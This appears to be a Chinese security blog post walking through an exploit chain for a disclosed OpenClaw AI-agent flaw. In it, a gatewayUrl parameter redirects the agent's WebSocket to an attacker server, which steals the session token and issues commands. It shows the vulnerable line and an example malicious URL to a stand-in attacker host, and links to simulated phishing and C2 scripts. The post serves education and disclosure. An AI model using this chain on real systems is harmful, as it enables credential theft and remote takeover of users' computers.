OpenClaw 远程网关信任漏洞导致本地 RCE

"内容为公开披露报告的整理，仅供技术讨论，详细免责声明见文章末尾，来源文章附录于页尾"

前言

上篇文章分析的漏洞，发现它的作者中有0xacb和vinnievan，而0xacb他的个人网址https://0xacb.com/有一章跳转到了Ethiack的网址，Ethiack使用Hackian约1h 40min内完成对OpenClaw(小龙虾)的漏洞发现(CVE-2026-25253)

漏洞概述

很多AI助手“权限在系统层（OS）”，但“攻击面在Web层”

攻击者服务器（钓鱼页面）        ↓诱导用户访问恶意链接        ↓浏览器加载本地 OpenClaw 页面（携带 gatewayUrl）        ↓OpenClaw agent 读取 gatewayUrl 参数        ↓agent 主动连接攻击者控制的 WebSocket 网关        ↓自动发送会话 token        ↓攻击者获取 token 并下发命令        ↓OpenClaw 执行命令 → RCE

即造成的后果是-->你就算躲在运营商三层nat后面，如果乱点链接，别人也能利用ai助手控制你电脑

模拟漏洞复现准备

附件 fake_openclaw.py
https://cliayn.github.io/tool/py/wechat-openclaw/fake_openclaw.py

假设该服务为openclaw的服务,存在如下功能

• 访问：

• http://localhost:18788/chat

• 这个页面模拟：

• 本地管理界面
• Token 存储在页面（模拟 LocalStorage）
• 一个按钮触发 WebSocket 通信

触发漏洞的核心在于

let gatewayUrl = urlParams.get('gatewayUrl') || "ws://127.0.0.1:8001";

👉 WebSocket 地址可被 URL 参数控制！

这就是漏洞入口：

http://localhost:18788/chat?gatewayUrl=ws://攻击者服务器

附件 attacker_server.py
https://cliayn.github.io/tool/py/wechat-openclaw/attacker_server.py

这是一个模拟的完整的攻击端控制系统（C2 + 钓鱼页面 + 数据回传）

它包含三个核心能力：

模块	作用
恶意HTTP页面	诱导用户触发漏洞
Token接收WebSocket	接收泄露的凭证
命令控制WebSocket	远程下发命令（C2）

模拟漏洞复现

开启“小龙虾”服务-在宿主机：

开启”攻击者的钓鱼网址“：

正常ai对话流程，宿主机会向网关发送请求：

正常情况（安全）

浏览器 → ws://官方网关（模拟的官方网关是ws://localhost:18789）

被攻击后（点击Lanch Exploit）

浏览器 → ws://攻击者服务器

wsl2的模拟日志：

结语

本文并未发现新的漏洞，而是基于已有 CVE，从攻击者视角出发，实现了一套完整的漏洞利用链路，包括：

• 恶意页面构造
• WebSocket 网关劫持
• Token 泄露
• 本地服务接管
• 命令执行（模拟）

旨在还原真实攻击过程，而非单点 PoC。

免责声明

尊敬的读者：

感谢您关注我们的公众号及阅读本文。为明确权责，特此声明如下：

信息准确性与时效性：

本文所涉及的网络安全技术、方法、工具及建议，均基于作者在撰写时的认知与实践经验。
我们力求信息准确可靠，但不保证其绝对无误、完整或适用于所有场景。网络安全领域发展迅速，本文内容可能随时间推移而过时或失效。
我们明确拒绝承担因信赖或使用本文信息所导致的任何直接或间接后果、损失或损害（包括但不限于系统故障、数据丢失、安全事件、经济损失等）。

责任豁免：

本文内容仅供学习、研究、参考之用，不构成任何形式的操作指南、安全保证或专业建议。
读者依据本文进行的任何操作、决策或尝试，风险均由读者自行承担。我们不对由此产生的任何结果（无论是否可预见）承担任何责任。

合法性与合规性要求：

本文所提及的技术、方法、工具及建议，仅限于合法授权范围内的网络安全研究、测试、防御与学习活动。
读者有义务确保其行为严格遵守所有适用的国家/地区法律、法规、行业规范及道德准则。
我们坚决反对并谴责任何形式的非法活动（如未经授权的系统入侵、数据窃取、服务破坏等）。读者将本文内容用于非法目的所产生的一切法律责任和后果，均由其自行承担，与本公众号及作者无关。

第三方资源与工具：

本文可能提及或链接第三方网站、工具、服务或资源。
我们无法控制亦不保证这些第三方内容的准确性、完整性、有效性、安全性或合法性。
引用或使用任何第三方资源，均由读者自行判断并承担风险，请务必遵守其各自的使用条款和隐私政策。我们不对第三方资源的内容或使用后果承担任何责任。

非专业服务：

本文不构成且不可替代专业的网络安全咨询、评估或服务。
如果您面临具体的网络安全挑战或需要个性化的解决方案，强烈建议您咨询持有相关资质的专业网络安全服务机构或专家。

关于漏洞信息：

本文所引用的安全漏洞信息均来源于公开披露且官方已确认修复的报告。
发布目的在于进行技术交流与安全警示，促进网络安全意识提升。
如相关方认为本文内容存在侵权，请及时联系我。

重要提示： 在采取任何涉及网络安全的行动前，请务必进行充分的风险评估，并确保获得所有必要的授权。